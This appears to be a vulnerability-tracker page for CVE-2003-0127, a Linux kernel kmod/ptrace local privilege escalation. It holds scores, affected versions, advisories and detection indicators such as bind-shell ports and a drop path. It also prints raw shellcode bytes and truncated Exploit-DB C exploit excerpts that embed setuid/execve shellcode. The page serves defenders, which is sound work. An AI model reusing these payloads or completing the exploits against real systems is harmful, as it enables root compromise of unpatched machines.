CVE-2003-0127
published 2003-03-31CVE-2003-0127: The kernel module loader in Linux kernel 2.2.x before 2.2.25, and 2.4.x before 2.4.21, allows local users to gain root privileges by using ptrace to attach to…
PriorityP276high7.2CVSS 2.0
AVLACLAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
1.58%
72.5th percentile
The kernel module loader in Linux kernel 2.2.x before 2.2.25, and 2.4.x before 2.4.21, allows local users to gain root privileges by using ptrace to attach to a child process that is spawned by the kernel.
Affected
47 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x90\x90\xeb\x1f\xb8\xb6\x00\x00\x00\x5b\x31\xc9\x89\xca\xcd\x80\xb8\x0f\x00\x00\x00\xb9\xed\x0d\x00\x00\xcd\x80\x89\xd0\x89\xd3\x40\xcd\x80\xe8\xdc\xff\xff\xff
bytes↗
\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x40\x50\x40\x50\x8d\x58\xff\x89\xe1\xb0\x66\xcd\x80
- →Monitor for unprivileged processes issuing socket(AF_SECURITY, SOCK_STREAM, 1) as a trigger to force kernel module loading (kmod), which is the exploit's mechanism to spawn the privileged child process. ↗
- →Alert on creation of world-executable scripts at /tmp/w00w00w, which is the hardcoded payload drop path used by one exploit variant. ↗
- →Detect processes writing shellcode via PTRACE_POKETEXT into a process whose /proc/<pid>/status shows uid=0/euid=0 while the tracing process is unprivileged. ↗
- →Watch for rapid sequential ptrace(PTRACE_ATTACH) attempts across a range of PIDs (chldpid+1 through chldpid+10, or 1 through 30000 in randomized mode) from a single process, indicative of PID-brute-forcing exploit variants. ↗
- →Detect inbound connections on port 4112 or 24876 from a host running a vulnerable kernel, as exploit variants bind a root shell on these ports post-exploitation. ↗
- →Temporary mitigation indicator: writing a non-executable path to /proc/sys/kernel/modprobe disables kmod and closes the attack vector. ↗
- ·The exploit has a hardcoded 10-second alarm timeout; if the race is not won within that window, it aborts. Detection logic should account for repeated short-lived exploit process executions. ↗
- ·Affected kernel versions are Linux 2.2.x before 2.2.25 and 2.4.x before 2.4.21. Systems running patched versions are not vulnerable. ↗
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vulncheck7.2HIGH
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
security flaw
vendor_redhat·2003-03-17·CVSS 7.2
CVE-2003-0127 [HIGH] security flaw
security flaw
The kernel module loader in Linux kernel 2.2.x before 2.2.25, and 2.4.x before 2.4.21, allows local users to gain root privileges by using ptrace to attach to a child process that is spawned by the kernel.
GHSA
GHSA-jhjp-mfjv-rvhx: The kernel module loader in Linux kernel 2
ghsa_unreviewed·2022-05-03
CVE-2003-0127 [HIGH] GHSA-jhjp-mfjv-rvhx: The kernel module loader in Linux kernel 2
The kernel module loader in Linux kernel 2.2.x before 2.2.25, and 2.4.x before 2.4.21, allows local users to gain root privileges by using ptrace to attach to a child process that is spawned by the kernel.
VulnCheck
Linux kernel 2.2.x before 2.2.25, and 2.4.x before 2.4.21 Kernel Module Loader Privilege Escalation
vulncheck·2003·CVSS 7.2
CVE-2003-0127 [HIGH] Linux kernel 2.2.x before 2.2.25, and 2.4.x before 2.4.21 Kernel Module Loader Privilege Escalation
Linux kernel 2.2.x before 2.2.25, and 2.4.x before 2.4.21 Kernel Module Loader Privilege Escalation
The kernel module loader in Linux kernel 2.2.x before 2.2.25, and 2.4.x before 2.4.21, allows local users to gain root privileges by using ptrace to attach to a child process that is spawned by the kernel.
Affected: Linux Kernel
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=a9c54f79-d780-437b-a7f5-a74960e299d5&CommunityKey=8af7f28f-02f1-4107-8639-93a60b6546d4&tab=librarydocuments
No detection rules found.
Exploit-DB
Linux Kernel < 2.4.20 - Module Loader Privilege Escalation
exploitdb·2003-04-14
CVE-2003-0127 Linux Kernel < 2.4.20 - Module Loader Privilege Escalation
Linux Kernel
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define TMPSIZE 4096
#define FMAX 768
#define UIDNUM 6
#define MMSIZE (4096*1)
#define MAXSTACK 0xc0000000
// where to put the root script
#define SHELL "/tmp/w00w00w"
// what to open to run modprobe
#define ENTRY "/dev/dsp3"
struct uids {
unsigned uid;
unsigned euid;
unsigned suid;
unsigned fsuid;
};
// thanks to the epcs2.c code :-))
char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x31\
xdb\xb0\x17\xcd\x80" /* setuid(0) */
"\x31\xc0\xb0\x2e\xcd\x80" "\x31\xc0\x50\xeb\x17\x8b\x1c\x24"
/* execve(SHELL) */
"\x90\x90\x90\x89\xe1\x8d\x54\x24" /* lets be tricky */
"\x04\xb0\x0b\xcd\x80\x31\xc0\x89"
"\xc3\x40\xcd\x80\xe8\xe4\xff\xff" "\xff" SHELL "\
Exploit-DB
Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (2)
exploitdb·2003-04-10
CVE-2003-0127 Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (2)
Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (2)
---
/*
source: https://www.securityfocus.com/bid/7112/info
A vulnerability has been discovered in the Linux kernel which can be exploited using the ptrace() system call. By attaching to an incorrectly configured root process, during a specific time window, it may be possible for an attacker to gain superuser privileges.
The problem occurs due to the kernel failing to restrict trace permissions on specific root spawned processes.
This vulnerability affects both the 2.2 and 2.4 Linux kernel trees.
*/
/*
* Author: snooq [http://www.angelfire.com/linux/snooq/]
* Date: 10 April 2003
*
* Wojciech Purczynski [ [email protected] ], says (in his code):
*
* [quote]
* This code exploits a race condition in kernel/kmod.
Exploit-DB
Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation
exploitdb·2003-03-30
CVE-2003-0127 Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation
Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation
---
/*
* Linux kernel ptrace/kmod local root exploit
*
* This code exploits a race condition in kernel/kmod.c, which creates
* kernel thread in insecure manner. This bug allows to ptrace cloned
* process, allowing to take control over privileged modprobe binary.
*
* Should work under all current 2.2.x and 2.4.x kernels.
*
* I discovered this stupid bug independently on January 25, 2003, that
* is (almost) two month before it was fixed and published by Red Hat
* and others.
*
* Wojciech Purczynski
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
* IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
*
* (c) 2003 Copyright by iSEC Security Research
*/
#include
#include
#include
#include
#include
#include
#include
#
Exploit-DB
Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (1)
exploitdb·2003-03-17
CVE-2003-0127 Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (1)
Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (1)
---
/*
source: https://www.securityfocus.com/bid/7112/info
A vulnerability has been discovered in the Linux kernel which can be exploited using the ptrace() system call. By attaching to an incorrectly configured root process, during a specific time window, it may be possible for an attacker to gain superuser privileges.
The problem occurs due to the kernel failing to restrict trace permissions on specific root spawned processes.
This vulnerability affects both the 2.2 and 2.4 Linux kernel trees.
*/
/* lame, oversophisticated local root exploit for kmod/ptrace bug in linux
* 2.2 and 2.4
*
* have fun
*/
#define ANY_SUID "/usr/bin/passwd"
#include
#include
#include
#include
#include
#include
#include
#inc
ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2003-020.0.txthttp://archives.neohapsis.com/archives/vulnwatch/2003-q1/0134.htmlhttp://marc.info/?l=bugtraq&m=105301461726555&w=2http://rhn.redhat.com/errata/RHSA-2003-088.htmlhttp://rhn.redhat.com/errata/RHSA-2003-098.htmlhttp://security.gentoo.org/glsa/glsa-200303-17.xmlhttp://www.debian.org/security/2003/dsa-270http://www.debian.org/security/2003/dsa-276http://www.debian.org/security/2003/dsa-311http://www.debian.org/security/2003/dsa-312http://www.debian.org/security/2003/dsa-332http://www.debian.org/security/2003/dsa-336http://www.debian.org/security/2004/dsa-423http://www.debian.org/security/2004/dsa-495http://www.kb.cert.org/vuls/id/628849http://www.mandriva.com/security/advisories?name=MDKSA-2003:038http://www.mandriva.com/security/advisories?name=MDKSA-2003:039http://www.redhat.com/support/errata/RHSA-2003-103.htmlhttp://www.redhat.com/support/errata/RHSA-2003-145.htmlhttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A254ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2003-020.0.txthttp://archives.neohapsis.com/archives/vulnwatch/2003-q1/0134.htmlhttp://marc.info/?l=bugtraq&m=105301461726555&w=2http://rhn.redhat.com/errata/RHSA-2003-088.htmlhttp://rhn.redhat.com/errata/RHSA-2003-098.htmlhttp://security.gentoo.org/glsa/glsa-200303-17.xmlhttp://www.debian.org/security/2003/dsa-270http://www.debian.org/security/2003/dsa-276http://www.debian.org/security/2003/dsa-311http://www.debian.org/security/2003/dsa-312http://www.debian.org/security/2003/dsa-332http://www.debian.org/security/2003/dsa-336http://www.debian.org/security/2004/dsa-423http://www.debian.org/security/2004/dsa-495http://www.kb.cert.org/vuls/id/628849http://www.mandriva.com/security/advisories?name=MDKSA-2003:038http://www.mandriva.com/security/advisories?name=MDKSA-2003:039http://www.redhat.com/support/errata/RHSA-2003-103.htmlhttp://www.redhat.com/support/errata/RHSA-2003-145.htmlhttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A254
2003-03-31
Published
Exploited in the wild